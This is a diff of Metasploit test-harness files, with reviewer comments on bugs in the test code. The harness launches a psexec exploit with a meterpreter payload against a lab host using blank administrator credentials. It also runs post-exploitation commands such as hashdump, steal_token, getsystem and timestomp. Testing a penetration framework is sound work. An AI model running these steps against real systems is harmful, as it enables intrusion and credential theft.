"read",
|
||||||
"run",
|
"run",
|
||||||
"use",
|
"use",
|
||||||
|
@ -27,7 +26,7 @@ module MeterpreterSpecs
|
||||||
"cd",
|
"cd",
|
||||||
"del",
|
"del",
|
||||||
"download",
|
"download",
|
||||||
#"edit",
|
# "edit",
|
||||||
"getlwd",
|
"getlwd",
|
||||||
"getwd",
|
"getwd",
|
||||||
"lcd",
|
"lcd",
|
||||||
|
@ -50,11 +49,11 @@ module MeterpreterSpecs
|
||||||
"getuid",
|
"getuid",
|
||||||
"kill",
|
"kill",
|
||||||
"ps",
|
"ps",
|
||||||
#"reboot",
|
# "reboot",
|
||||||
"reg",
|
"reg",
|
||||||
"rev2self",
|
"rev2self",
|
||||||
#"shell",
|
# "shell",
|
||||||
#"shutdown",
|
# "shutdown",
|
||||||
"steal_token",
|
"steal_token",
|
||||||
"sysinfo",
|
"sysinfo",
|
||||||
"enumdesktops",
|
"enumdesktops",
|
||||||
|
@ -69,41 +68,43 @@ module MeterpreterSpecs
|
||||||
"getsystem",
|
"getsystem",
|
||||||
"hashdump",
|
"hashdump",
|
||||||
"timestomp"
|
"timestomp"
|
||||||
]
|
]
|
||||||
|
|
||||||
## Run each command, check for execeptions
|
## Run each command, check for execeptions
|
||||||
commands.each do |command|
|
commands.each do |command|
|
||||||
hlp_run_command_check_output("basic_#{command}",command)
|
hlp_run_command_check_output("basic_#{command}", command)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
it "should not error when running help" do
|
it "should not error when running help" do
|
||||||
success_strings = [ 'Core Commands',
|
success_strings = [
|
||||||
'Stdapi: File system Commands',
|
'Core Commands',
|
||||||
'Stdapi: Networking Commands',
|
'Stdapi: File system Commands',
|
||||||
'Stdapi: System Commands',
|
'Stdapi: Networking Commands',
|
||||||
'Stdapi: User interface Commands']
|
'Stdapi: System Commands',
|
||||||
|
'Stdapi: User interface Commands'
|
||||||
hlp_run_command_check_output("help","help", success_strings)
|
]
|
||||||
|
|
||||||
|
hlp_run_command_check_output("help", "help", success_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should not error when running the help shortcut" do
|
||||||
|
success_strings = [
|
||||||
|
'Core Commands',
|
||||||
|
'Stdapi: File system Commands',
|
||||||
|
'Stdapi: Networking Commands',
|
||||||
|
'Stdapi: System Commands',
|
||||||
|
'Stdapi: User interface Commands'
|
||||||
|
]
|
||||||
|
|
||||||
|
hlp_run_command_check_output("help_shortcut", "?", success_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should not error when checking for background channels" do
|
||||||
|
success_strings = [ 'No active channels.' ]
|
||||||
|
hlp_run_command_check_output("channel_list_empty", "channel -l", success_strings)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should not error when running the help shortcut" do
|
|
||||||
success_strings = [ 'Core Commands',
|
|
||||||
'Stdapi: File system Commands',
|
|
||||||
'Stdapi: Networking Commands',
|
|
||||||
'Stdapi: System Commands',
|
|
||||||
'Stdapi: User interface Commands' ]
|
|
||||||
|
|
||||||
hlp_run_command_check_output("help_shortcut","?", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
it "should not error when checking for background channels" do
|
|
||||||
success_strings = [ 'No active channels.' ]
|
|
||||||
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -10,94 +10,87 @@ require 'meterpreter_specs'
|
||||||
require 'windows_meterpreter_specs'
|
require 'windows_meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "Win32Meterpreter" do
|
||||||
|
# Include Custom Matchers
|
||||||
|
include MsfTest::MsfMatchers
|
||||||
|
|
||||||
describe "Win32Meterpreter" do
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
# Include Custom Matchers
|
# This include brings in all the specs that are generic across the
|
||||||
include MsfTest::MsfMatchers
|
# meterpreter platforms
|
||||||
|
include MsfTest::MeterpreterSpecs
|
||||||
|
|
||||||
|
# This include brings in all the specs that are specific to the
|
||||||
# This include brings in all the spec helper methods
|
# windows meterpreter platforms
|
||||||
include MsfTest::MeterpreterSpecHelper
|
include MsfTest::WindowsMeterpreterSpecs
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
# This include brings in all the specs that are specific to the
|
before :all do
|
||||||
# windows meterpreter platforms
|
@verbose = true
|
||||||
include MsfTest::WindowsMeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
@meterpreter_type = "win32"
|
||||||
@verbose = true
|
|
||||||
|
|
||||||
@meterpreter_type = "win32"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
## Set up an outupt directory
|
||||||
FileUtils.rm_rf(@output_directory)
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_windows_x32
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
before :each do
|
||||||
@default_file = "#{@output_directory}/default"
|
end
|
||||||
|
|
||||||
create_session_windows_x32
|
after :each do
|
||||||
end
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
before :each do
|
after :all do
|
||||||
|
## Clean up test output
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
|
||||||
end
|
## Screenshot command leaves .jpegs :(
|
||||||
|
## TODO - fix the meterpreter command to write to
|
||||||
after :each do
|
## TODO - an arbitrary file.
|
||||||
@session.init_ui(@input, @output)
|
Dir.new(File.dirname(__FILE__)).each do |file|
|
||||||
end
|
if file =~ /.jpeg/
|
||||||
|
File.delete(file)
|
||||||
after :all do
|
end
|
||||||
|
|
||||||
## Clean up test output
|
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
|
|
||||||
## Screenshot command leaves .jpegs :(
|
|
||||||
## TODO - fix the meterpreter command to write to
|
|
||||||
## TODO - an arbitrary file.
|
|
||||||
Dir.new(File.dirname(__FILE__)).each do |file|
|
|
||||||
if file =~ /.jpeg/
|
|
||||||
File.delete(file)
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_session_windows_x32
|
|
||||||
|
|
||||||
## Setup for win32
|
def create_session_windows_x32
|
||||||
@framework = Msf::Simple::Framework.create
|
## Setup for win32
|
||||||
@exploit_name = 'windows/smb/psexec'
|
@framework = Msf::Simple::Framework.create
|
||||||
@payload_name = 'windows/meterpreter/bind_tcp'
|
@exploit_name = 'windows/smb/psexec'
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
@payload_name = 'windows/meterpreter/bind_tcp'
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
# Initialize the exploit instance
|
# Initialize the exploit instance
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
## Fire it off against a known-vulnerable host
|
||||||
@session = exploit.exploit_simple(
|
@session = exploit.exploit_simple(
|
||||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||||
'Payload' => @payload_name,
|
'Payload' => @payload_name,
|
||||||
'LocalInput' => @input,
|
'LocalInput' => @input,
|
||||||
'LocalOutput' => @output)
|
'LocalOutput' => @output
|
||||||
|
)
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
## If a session came back, try to interact with it.
|
||||||
if @session
|
if @session
|
||||||
puts "got a session"
|
puts "got a session"
|
||||||
@session.load_stdapi
|
@session.load_stdapi
|
||||||
else
|
else
|
||||||
puts "unable to get session"
|
puts "unable to get session"
|
||||||
#flunk "Couldn't get a session!"
|
# flunk "Couldn't get a session!"
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
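Review bot: The `after :all` cleanup in this spec deletes by a loose pattern and a bare entry name: `file =~ /.jpeg/` matches any character followed by `jpeg` anywhere in the name, and `File.delete(file)` resolves the name yielded by `Dir.new(File.dirname(__FILE__))` against the process working directory, not the spec directory. When the suite is started from another directory the call either raises or removes an unrelated file of the same name. Anchor the pattern and join the path: `path = File.join(File.dirname(__FILE__), file)` then `File.delete(path) if file =~ /\.jpeg\z/`. Separately, with `flunk` commented out in `create_session_windows_x32`, a failed session leaves `@session` nil and `after :each` still calls `@session.init_ui` on it.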
|
||||||
|
|
|
@ -1,49 +1,46 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module WindowsMeterpreterSpecs
|
module WindowsMeterpreterSpecs
|
||||||
|
## This file is intended to be used in conjunction with a harness,
|
||||||
|
## such as meterpreter_win32_spec.rb
|
||||||
|
|
||||||
## This file is intended to be used in conjunction with a harness,
|
def self.included(base)
|
||||||
## such as meterpreter_win32_spec.rb
|
base.class_eval do
|
||||||
|
it "should not error when uploading a file to a windows box" do
|
||||||
|
upload_success_strings = [
|
||||||
|
'uploading',
|
||||||
|
'uploaded'
|
||||||
|
]
|
||||||
|
|
||||||
def self.included(base)
|
## create a file to upload
|
||||||
base.class_eval do
|
filename = "/tmp/whatever"
|
||||||
|
if File.exist?(filename)
|
||||||
|
FileUtils.rm(filename)
|
||||||
|
end
|
||||||
|
hlp_string_to_file("owned!", filename)
|
||||||
|
|
||||||
it "should not error when uploading a file to a windows box" do
|
## run the upload / quit commands
|
||||||
upload_success_strings = [ 'uploading',
|
hlp_run_command_check_output("upload", "upload #{filename} C:\\", upload_success_strings)
|
||||||
'uploaded' ]
|
# hlp_run_command_check_output("quit","quit")
|
||||||
|
|
||||||
## create a file to upload
|
## clean up
|
||||||
filename = "/tmp/whatever"
|
|
||||||
if File.exist?(filename)
|
|
||||||
FileUtils.rm(filename)
|
FileUtils.rm(filename)
|
||||||
end
|
end
|
||||||
hlp_string_to_file("owned!", filename)
|
|
||||||
|
|
||||||
## run the upload / quit commands
|
it "should show the priv commands when running help" do
|
||||||
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
|
success_strings = [
|
||||||
#hlp_run_command_check_output("quit","quit")
|
'Priv: Elevate Commands',
|
||||||
|
'Priv: Password database Commands',
|
||||||
|
'Priv: Timestomp Commands'
|
||||||
|
]
|
||||||
|
|
||||||
## clean up
|
hlp_run_command_check_output("help_shortcut", "help", success_strings)
|
||||||
FileUtils.rm(filename)
|
end
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
it "should show the priv commands when running help" do
|
|
||||||
|
|
||||||
success_strings = ['Priv: Elevate Commands',
|
|
||||||
'Priv: Password database Commands',
|
|
||||||
'Priv: Timestomp Commands' ]
|
|
||||||
|
|
||||||
hlp_run_command_check_output("help_shortcut","help", success_strings)
|
|
||||||
|
|
||||||
|
it "should not error when taking a screenshot" do
|
||||||
|
success_strings = [ 'Screenshot saved to' ]
|
||||||
|
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should not error when taking a screenshot" do
|
|
||||||
success_strings = [ 'Screenshot saved to' ]
|
|
||||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
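Review bot: The upload example stages its fixture at the fixed path `/tmp/whatever`, a predictable name in a shared directory, and the `File.exist?` / `FileUtils.rm` / write sequence is not atomic, so another local account can own or replace that name between the steps. `hlp_string_to_file` is defined outside this section, so how it opens the file cannot be confirmed from here. A private per-run path avoids the problem: `filename = File.join(Dir.mktmpdir("msftest"), "upload_fixture")` (needs `require 'tmpdir'`), with the directory removed in the clean-up step. The current clean-up also runs only when the upload check passes, so a failed example leaves the fixture behind.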
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
class Array
|
class Array
|
||||||
@@to_s_reported = {}
|
@@to_s_reported = {}
|
||||||
def to_s(*args)
|
def to_s(*args)
|
||||||
if(not @@to_s_reported[caller[0].to_s])
|
if (not @@to_s_reported[caller[0].to_s])
|
||||||
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
|
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
|
||||||
@@to_s_reported[caller[0].to_s] = true
|
@@to_s_reported[caller[0].to_s] = true
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,7 +1,6 @@
|
||||||
class String
|
class String
|
||||||
@@idx_reported = {}
|
@@idx_reported = {}
|
||||||
def [](*args)
|
def [](*args)
|
||||||
|
|
||||||
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
|
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
|
||||||
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
|
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
|
||||||
@@idx_reported[caller[0].to_s] = true
|
@@idx_reported[caller[0].to_s] = true
|
||||||
|
|
|
@ -1,68 +1,63 @@
|
||||||
|
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
module ModuleTest
|
||||||
|
attr_accessor :tests
|
||||||
|
attr_accessor :failures
|
||||||
|
|
||||||
module ModuleTest
|
def initialize(info = {})
|
||||||
attr_accessor :tests
|
@tests = 0
|
||||||
attr_accessor :failures
|
@failures = 0
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
def initialize(info={})
|
def run_all_tests
|
||||||
@tests = 0
|
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
|
||||||
@failures = 0
|
tests.each { |test_method|
|
||||||
super
|
self.send(test_method)
|
||||||
end
|
}
|
||||||
|
end
|
||||||
|
|
||||||
def run_all_tests
|
def it(msg = "", &block)
|
||||||
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
|
@tests += 1
|
||||||
tests.each { |test_method|
|
begin
|
||||||
self.send(test_method)
|
result = block.call
|
||||||
}
|
unless result
|
||||||
|
print_error("FAILED: #{msg}")
|
||||||
end
|
print_error("FAILED: #{error}") if error
|
||||||
|
@failures += 1
|
||||||
def it(msg="", &block)
|
return
|
||||||
@tests += 1
|
end
|
||||||
begin
|
rescue ::Exception => e
|
||||||
result = block.call
|
|
||||||
unless result
|
|
||||||
print_error("FAILED: #{msg}")
|
print_error("FAILED: #{msg}")
|
||||||
print_error("FAILED: #{error}") if error
|
print_error("Exception: #{e.class} : #{e}")
|
||||||
@failures += 1
|
dlog("Exception in testing - #{msg}")
|
||||||
|
dlog("Call stack: #{e.backtrace.join("\n")}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
rescue ::Exception => e
|
|
||||||
print_error("FAILED: #{msg}")
|
print_good("#{msg}")
|
||||||
print_error("Exception: #{e.class} : #{e}")
|
|
||||||
dlog("Exception in testing - #{msg}")
|
|
||||||
dlog("Call stack: #{e.backtrace.join("\n")}")
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_good("#{msg}")
|
def pending(msg = "", &block)
|
||||||
|
print_status("PENDING: #{msg}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def pending(msg="", &block)
|
module ModuleTest::PostTest
|
||||||
print_status("PENDING: #{msg}")
|
include ModuleTest
|
||||||
end
|
def run
|
||||||
end
|
print_status("Running against session #{datastore["SESSION"]}")
|
||||||
|
print_status("Session type is #{session.type} and platform is #{session.platform}")
|
||||||
|
|
||||||
module ModuleTest::PostTest
|
t = Time.now
|
||||||
include ModuleTest
|
@tests = 0; @failures = 0
|
||||||
def run
|
run_all_tests
|
||||||
print_status("Running against session #{datastore["SESSION"]}")
|
|
||||||
print_status("Session type is #{session.type} and platform is #{session.platform}")
|
|
||||||
|
|
||||||
t = Time.now
|
vprint_status("Testing complete in #{Time.now - t}")
|
||||||
@tests = 0; @failures = 0
|
if (@failures > 0)
|
||||||
run_all_tests
|
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
||||||
|
else
|
||||||
vprint_status("Testing complete in #{Time.now - t}")
|
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
||||||
if (@failures > 0)
|
end
|
||||||
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
|
||||||
else
|
|
||||||
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
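Review bot: In `it`, the `rescue ::Exception` branch prints `FAILED` and returns without incrementing `@failures`, so a test block that raises is shown as failed but is missing from the `Passed: … Failed: …` summary that `run` prints. Add `@failures += 1` before the `return` in the rescue branch. The line `print_error("FAILED: #{error}") if error` reads `error`, which nothing in this section defines; unless the including module supplies it, that line raises NameError before `@failures += 1` is reached and the falsy-result path is undercounted in the same way. Rescuing `::StandardError` instead of `::Exception` would also stop the harness from swallowing Interrupt and SystemExit.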
|
|
||||||
|
|
|
@ -2,93 +2,91 @@ $:.unshift(File.join((File.dirname(__FILE__))))
|
||||||
require 'regexr'
|
require 'regexr'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
module MsfMatchers
|
||||||
|
class ContainACompleteTest
|
||||||
|
|
||||||
module MsfMatchers
|
def initialize()
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
class ContainACompleteTest
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
return @r.verify_start_and_end(@data, "meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"Beginning or end was incorrect."
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_failure_message
|
||||||
|
"Expected to find a no beginning or end, but it matched."
|
||||||
|
end
|
||||||
|
|
||||||
def initialize()
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def matches?(data)
|
def contain_a_complete_test
|
||||||
@data = data
|
ContainACompleteTest.new
|
||||||
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def failure_message
|
class ContainAllSuccesses
|
||||||
"Beginning or end was incorrect."
|
|
||||||
|
def initialize(successes = [])
|
||||||
|
@successes = successes
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
@string = @r.find_strings_that_dont_exist_in_data(@data, @successes)
|
||||||
|
return true if !@string
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"expected all successes, but didn't find '#{@string}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_failure_message
|
||||||
|
"expected to miss successes but found'm all :("
|
||||||
|
end
|
||||||
|
|
||||||
|
# alias :have_all_successes :contain_all_successes
|
||||||
end
|
end
|
||||||
|
|
||||||
def negative_failure_message
|
def contain_all_successes(successes = [])
|
||||||
"Expected to find a no beginning or end, but it matched."
|
ContainAllSuccesses.new(successes)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
class ContainNoFailuresExcept
|
||||||
|
|
||||||
|
def initialize(failures = [], exceptions = [])
|
||||||
|
@failures = failures
|
||||||
|
@exceptions = exceptions
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
@string = @r.find_strings_that_exist_in_data_except(@data, @failures, @exceptions)
|
||||||
|
return true if !@string
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"expected no failure to be found, but found this: '#{@string}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_falure_message
|
||||||
|
"expected to find failures, but didn't find any :("
|
||||||
|
end
|
||||||
|
|
||||||
|
# alias :have_no_failures :contain_no_failures
|
||||||
|
end
|
||||||
|
|
||||||
|
def contain_no_failures_except(failures = [], exceptions = [])
|
||||||
|
ContainNoFailuresExcept.new(failures, exceptions)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def contain_a_complete_test
|
|
||||||
ContainACompleteTest.new
|
|
||||||
end
|
|
||||||
|
|
||||||
class ContainAllSuccesses
|
|
||||||
|
|
||||||
def initialize(successes=[])
|
|
||||||
@successes = successes
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
|
||||||
|
|
||||||
def matches?(data)
|
|
||||||
@data = data
|
|
||||||
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
|
|
||||||
return true if !@string
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def failure_message
|
|
||||||
"expected all successes, but didn't find '#{@string}'"
|
|
||||||
end
|
|
||||||
|
|
||||||
def negative_failure_message
|
|
||||||
"expected to miss successes but found'm all :("
|
|
||||||
end
|
|
||||||
|
|
||||||
#alias :have_all_successes :contain_all_successes
|
|
||||||
end
|
|
||||||
|
|
||||||
def contain_all_successes(successes=[])
|
|
||||||
ContainAllSuccesses.new(successes)
|
|
||||||
end
|
|
||||||
|
|
||||||
class ContainNoFailuresExcept
|
|
||||||
|
|
||||||
def initialize(failures=[],exceptions=[])
|
|
||||||
@failures = failures
|
|
||||||
@exceptions = exceptions
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
|
||||||
|
|
||||||
def matches?(data)
|
|
||||||
@data = data
|
|
||||||
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
|
|
||||||
return true if !@string
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def failure_message
|
|
||||||
"expected no failure to be found, but found this: '#{@string}'"
|
|
||||||
end
|
|
||||||
|
|
||||||
def negative_falure_message
|
|
||||||
"expected to find failures, but didn't find any :("
|
|
||||||
end
|
|
||||||
|
|
||||||
#alias :have_no_failures :contain_no_failures
|
|
||||||
end
|
|
||||||
|
|
||||||
def contain_no_failures_except(failures=[],exceptions=[])
|
|
||||||
ContainNoFailuresExcept.new(failures,exceptions)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
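Review bot: `ContainNoFailuresExcept` defines `negative_falure_message` (missing `i`), while `ContainACompleteTest` and `ContainAllSuccesses` in the same section define `negative_failure_message`, so a negated expectation on this matcher cannot find its message under the common name. Rename it to `def negative_failure_message`. The commented-out `alias` lines sit inside the matcher classes, where they would alias instance methods of the class and not the `contain_*` helper methods; they can be dropped or moved next to the helpers.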
|
||||||
|
|
|
@ -6,84 +6,80 @@
|
||||||
|
|
||||||
class Regexr
|
class Regexr
|
||||||
|
|
||||||
def initialize(verbose=false, case_insensitive=true)
|
def initialize(verbose = false, case_insensitive = true)
|
||||||
@verbose = verbose
|
@verbose = verbose
|
||||||
@case_insensitive = case_insensitive
|
@case_insensitive = case_insensitive
|
||||||
end
|
end
|
||||||
|
|
||||||
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
|
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
|
||||||
def verify_start_and_end(data,the_start,the_end)
|
def verify_start_and_end(data, the_start, the_end)
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
regex_start = Regexp.new(the_start, @case_insensitive)
|
regex_start = Regexp.new(the_start, @case_insensitive)
|
||||||
regex_end = Regexp.new(the_end, @case_insensitive)
|
regex_end = Regexp.new(the_end, @case_insensitive)
|
||||||
|
|
||||||
if regex_start =~ data_lines.first
|
if regex_start =~ data_lines.first
|
||||||
return regex_end =~ data_lines.last
|
return regex_end =~ data_lines.last
|
||||||
end
|
end
|
||||||
|
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
# Scan for any number of success lines. In order to pass, all successes must match.
|
# Scan for any number of success lines. In order to pass, all successes must match.
|
||||||
def find_strings_that_dont_exist_in_data(data,regexes=[])
|
def find_strings_that_dont_exist_in_data(data, regexes = [])
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
|
|
||||||
return nil unless regexes ## count as a pass
|
return nil unless regexes ## count as a pass
|
||||||
|
|
||||||
if regexes
|
if regexes
|
||||||
target_successes = regexes.size
|
target_successes = regexes.size
|
||||||
success_count = 0
|
success_count = 0
|
||||||
regexes.each { |condition|
|
regexes.each { |condition|
|
||||||
|
|
||||||
## assume we haven't got it
|
## assume we haven't got it
|
||||||
found = false
|
found = false
|
||||||
|
|
||||||
re = Regexp.new(condition, @case_insensitive)
|
re = Regexp.new(condition, @case_insensitive)
|
||||||
|
|
||||||
## for each of our data lines
|
## for each of our data lines
|
||||||
data_lines.each {|line|
|
data_lines.each { |line|
|
||||||
|
|
||||||
## if it's a match
|
## if it's a match
|
||||||
if line =~ re
|
if line =~ re
|
||||||
found = true
|
found = true
|
||||||
break ## success!
|
break ## success!
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
if !found
|
if !found
|
||||||
return condition ## return this string, it wasn't found.
|
return condition ## return this string, it wasn't found.
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
nil ## got all successes, woot!
|
nil ## got all successes, woot!
|
||||||
end
|
end
|
||||||
|
|
||||||
# Scan for failures -- if any single failure matches, the test returns true.
|
# Scan for failures -- if any single failure matches, the test returns true.
|
||||||
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
|
def find_strings_that_exist_in_data_except(data, regexes = [], exceptions = [])
|
||||||
|
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
|
|
||||||
return nil unless regexes ## count as a pass
|
return nil unless regexes ## count as a pass
|
||||||
|
|
||||||
regexes.each { |condition|
|
regexes.each { |condition|
|
||||||
|
## for each failure condition that we've been passed
|
||||||
## for each failure condition that we've been passed
|
|
||||||
re = Regexp.new(condition, @case_insensitive)
|
re = Regexp.new(condition, @case_insensitive)
|
||||||
|
|
||||||
## assume we're okay
|
## assume we're okay
|
||||||
found = false
|
found = false
|
||||||
|
|
||||||
data_lines.each { |line|
|
data_lines.each { |line|
|
||||||
if re =~ line
|
if re =~ line
|
||||||
found = true # oh, we found a match
|
found = true # oh, we found a match
|
||||||
|
|
||||||
# but let's check the exceptions
|
# but let's check the exceptions
|
||||||
exceptions.map { |exception|
|
exceptions.map { |exception|
|
||||||
reg_exception = Regexp.new(exception, @case_insensitive)
|
reg_exception = Regexp.new(exception, @case_insensitive)
|
||||||
|
@ -95,12 +91,12 @@ class Regexr
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
# If we didn't find an exception, we have to fail it. do not pass go.
|
# If we didn't find an exception, we have to fail it. do not pass go.
|
||||||
return condition if found
|
return condition if found
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
nil ## no failures found!
|
nil ## no failures found!
|
||||||
end
|
end
|
||||||
end
|
end
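Review bot: Both scan methods open with `return false unless data`, and the matcher classes shown earlier on this page treat any falsy result as a pass (`return true if !@string`), so a run that produced no output at all satisfies both `contain_all_successes` and `contain_no_failures_except`. Make missing output an explicit failure, for example `raise ArgumentError, 'no output to scan' unless data`. The expected strings are also passed to `Regexp.new` unescaped, so any metacharacter in a success or failure string is read as a pattern; use `Regexp.new(Regexp.escape(condition), @case_insensitive)` if literal matching is intended. The body of `find_strings_that_exist_in_data_except` is split across the two hunks with lines elided between them, so the exception handling inside the loop is not fully visible here.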
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,19 +10,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Network Capture Tester',
|
'Name' => 'Simple Network Capture Tester',
|
||||||
'Description' => 'This module sniffs HTTP GET requests from the network',
|
'Description' => 'This module sniffs HTTP GET requests from the network',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
[ 'Sniffer' ]
|
||||||
[ 'Sniffer' ]
|
],
|
||||||
],
|
'PassiveActions' => [
|
||||||
'PassiveActions' =>
